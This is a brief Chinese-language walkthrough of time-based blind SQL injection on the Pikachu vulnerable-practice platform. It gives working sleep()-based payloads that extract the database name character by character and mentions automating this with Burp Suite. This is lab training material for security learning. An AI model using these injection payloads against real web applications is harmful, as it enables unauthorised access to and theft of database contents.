pikachu的盲注(base on time)
打开pikachu测试平台。
先输入一个’ 尝试一下,发现反馈不报错。
输入kobe,发现反馈信息不变
打开浏览器的开发者工具(F12),控制台,选择网络。
输入 kobe’ and sleep(5)#,发现延迟5秒发送。
输入错误信息,发现sleep语句不执行
这样我们就可以写一个判断
kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)#
输入
kobe’ and if((substr(database(),1,1))=‘a’,sleep(5),null)#
发现,直接发送,没有暂停。
以此类推,直到输入
kobe' and if((substr(database(),1,1))='p',sleep(5),null)#
等待了5秒钟之后,才发送。说明猜测正确,数据库的首字母为p.
这样,一次基于时间的sqli盲注就完成了,也可以利用burpsuit批量破解得到自己想要的数据。